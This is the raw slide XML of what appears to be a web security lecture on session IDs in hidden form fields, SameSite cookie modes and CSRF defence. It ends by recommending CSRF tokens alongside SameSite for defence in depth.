          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="671513" y="1914525"/>
            <a:ext cx="8712200" cy="117475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3992879"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 52069"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 3992879"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 52069"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 3992879"/>
              <a:gd name="T5" fmla="*/ 0 h 52069"/>
              <a:gd name="T6" fmla="*/ 0 w 3992879"/>
              <a:gd name="T7" fmla="*/ 0 h 52069"/>
              <a:gd name="T8" fmla="*/ 0 w 3992879"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 520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92879" h="52069">
                <a:moveTo>
                  <a:pt x="0" y="51815"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3992879" y="51815"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3992879" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="518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1" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{274D91AD-D79B-5547-9F5E-7D819B056F52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="785813" y="3108325"/>
            <a:ext cx="222250" cy="228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24582" name="object 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1E309BB-514E-1045-A9ED-7F6241CA8C79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9237663" y="3073400"/>
            <a:ext cx="260350" cy="2667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24583" name="object 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E76925C-D1FC-D14A-8075-B0445348ECD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="890588" y="3187700"/>
            <a:ext cx="8378825" cy="152400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 3840479"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 67309"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 3840479"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 67309"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 3840479"/>
              <a:gd name="T5" fmla="*/ 0 h 67309"/>
              <a:gd name="T6" fmla="*/ 0 w 3840479"/>
              <a:gd name="T7" fmla="*/ 0 h 67309"/>
              <a:gd name="T8" fmla="*/ 0 w 3840479"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 67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0479" h="67309">
                <a:moveTo>
                  <a:pt x="0" y="67055"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3840479" y="67055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3840479" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6705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4" name="object 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7FF58300-9817-154B-9048-122B506848F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9375775" y="1593850"/>
            <a:ext cx="122238" cy="2381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24585" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ABC67DD-F4AC-994B-A332-93B34998EDFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9375775" y="1711325"/>
            <a:ext cx="122238" cy="1401763"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 55245"/>
              <a:gd name="T1" fmla="*/ 2147483646 h 624840"/>
              <a:gd name="T2" fmla="*/ 2147483646 w 55245"/>
              <a:gd name="T3" fmla="*/ 2147483646 h 624840"/>
              <a:gd name="T4" fmla="*/ 2147483646 w 55245"/>
              <a:gd name="T5" fmla="*/ 0 h 624840"/>
              <a:gd name="T6" fmla="*/ 0 w 55245"/>
              <a:gd name="T7" fmla="*/ 0 h 624840"/>
              <a:gd name="T8" fmla="*/ 0 w 55245"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 6248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245" h="624840">
                <a:moveTo>
                  <a:pt x="0" y="624839"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="54863" y="624839"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54863" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="62483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6" name="object 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C75D721-5B06-EC45-B111-ECB84A8D4533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="674688" y="2014538"/>
            <a:ext cx="8704262" cy="1208087"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T1" fmla="*/ 0 h 537210"/>
              <a:gd name="T2" fmla="*/ 0 w 3989704"/>
              <a:gd name="T3" fmla="*/ 0 h 537210"/>
              <a:gd name="T4" fmla="*/ 0 w 3989704"/>
              <a:gd name="T5" fmla="*/ 2147483646 h 537210"/>
              <a:gd name="T6" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T7" fmla="*/ 2147483646 h 537210"/>
              <a:gd name="T8" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T9" fmla="*/ 2147483646 h 537210"/>
              <a:gd name="T10" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T11" fmla="*/ 2147483646 h 537210"/>
              <a:gd name="T12" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T13" fmla="*/ 2147483646 h 537210"/>
              <a:gd name="T14" fmla="*/ 2147483646 w 3989704"/>
              <a:gd name="T15" fmla="*/ 0 h 5372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89704" h="537210">
                <a:moveTo>
                  <a:pt x="3989645" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="486241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16635" y="523754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3938835" y="537042"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953081" y="534997"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3984206" y="509043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3989645"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4587" name="object 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C6F805C-B922-6247-8D89-391C28C29FF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9378950" y="1682750"/>
            <a:ext cx="0" cy="1468438"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 h 653415"/>
              <a:gd name="T1" fmla="*/ 0 h 653415"/>
              <a:gd name="T2" fmla="*/ 0 60000 65536"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T2">
                <a:pos x="0" y="T0"/>
              </a:cxn>
              <a:cxn ang="T3">
                <a:pos x="0" y="T1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path h="653415">
                <a:moveTo>
                  <a:pt x="0" y="652951"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="7F7F7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8" name="object 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F79A455-92BC-774B-8116-CEDF923F46CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9378950" y="1654175"/>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691"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="AFAFA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89" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{068944AA-77C2-CB45-A1BC-8214883AF877}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9378950" y="1625600"/>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704"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="CECEC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90" name="object 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5853E4B-5943-2C4D-95ED-D66C7FEC0EE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9378950" y="1597025"/>
            <a:ext cx="0" cy="28575"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2147483646 h 12700"/>
              <a:gd name="T1" fmla="*/ 0 h 12700"/>
              <a:gd name="T2" fmla="*/ 0 60000 65536"/>
              <a:gd name="T3" fmla="*/ 0 60000 65536"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T2">
                <a:pos x="0" y="T0"/>
              </a:cxn>
              <a:cxn ang="T3">
                <a:pos x="0" y="T1"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path h="12700">
                <a:moveTo>
                  <a:pt x="0" y="12704"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="EFEFE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591" name="object 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DEC761A-ECB3-014F-AC4A-E2F43CAD72A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="758825" y="1528763"/>
            <a:ext cx="8537575"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a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The principle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Include an HTML form with a hidden field containing a session ID in all the HTML pages sent to the client. This hidden field will be returned back to the server in the request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1963"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> the web server can send a hidden HTML form field along with a unique session ID as follows:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:spcBef>
                <a:spcPts val="2050"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:ea typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
                <a:cs typeface="PMingLiU" panose="02020500000000000000" pitchFamily="18" charset="-120"/>
              </a:rPr>
              <a:t>&lt;input  type="hidden"  name="sessionid"  value="12345"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="103000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1988"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="007200"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>When the form is submitted, the specified name and value are automatically included in the GET or POST data.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B060403050404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F7BDEA9D-81AA-7841-BEA1-097EA49202DD}"/>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
        <p:nvSpPr>
          <p:cNvPr id="81923" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EACC600-CCD5-934C-A3AA-3838CE897008}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="1539875"/>
            <a:ext cx="7918450" cy="4403725"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Resources can be loaded by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> tags, and script tags. These requests can also operate as GET requests, but none of them cause TOP LEVEL navigation. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>Basically, they don't change the URL in your address bar. Because these GET requests do not cause a TOP LEVEL navigation, thus cookies set to Lax won't be sent with them.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="en-US" dirty="0">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110596" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40842C15-9D32-3E42-B784-A7B0F43C6839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="6942138"/>
            <a:ext cx="8686800" cy="83026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r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="C7254E"/>
                </a:solidFill>
                <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Set-Cookie: CookieName=CookieValue; SameSite=Lax;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400"/>
            </a:br>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110597" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6B93D51-A88C-D445-8D59-1287F723830A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="914400"/>
            <a:ext cx="79184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700" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lax</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C318BC1F-C85A-8F40-B1D8-AB23A74F36A8}"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="112643" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{083B477D-D1D8-5445-8655-F99D685A15FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="1066800"/>
            <a:ext cx="7918450" cy="428625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example for Lax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="112644" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87970B69-B62E-E541-8BDF-3C4BA7588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952658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821BBC96-1F0F-4E49-AB76-2FEB0C8F8856}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="381000"/>
            <a:ext cx="9286875" cy="862013"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Same-Site Cookie Attribute to Prevent CSRF Attacks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="114691" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2917013A-A227-464A-9DA0-BD4611252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8" y="1828800"/>
            <a:ext cx="8229600" cy="479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2" name="Text Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C8171C8-5867-8249-BD7D-F8C72B403710}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="1019175"/>
            <a:ext cx="79184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r>
              <a:rPr lang="en-US" altLang="en-US" sz="2700" b="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Lax</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C38B-E46B-21BA-AA8A-7D0CC0EC79AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771527" y="812800"/>
            <a:ext cx="8515350" cy="2308324"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Is Same-Site enough or CSRF tokens are still needed?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D272685D-D010-E483-3BBF-5B156E6F7CE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069975" y="4343400"/>
            <a:ext cx="7918450" cy="1329595"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use both for defense in depth!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You can bypass same-site policy, e.g. by converting POST requests to GET as a MITM.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1997077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942E482-701D-A740-87F5-4F76A385AA15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2125663" y="1244600"/>
            <a:ext cx="5807075" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
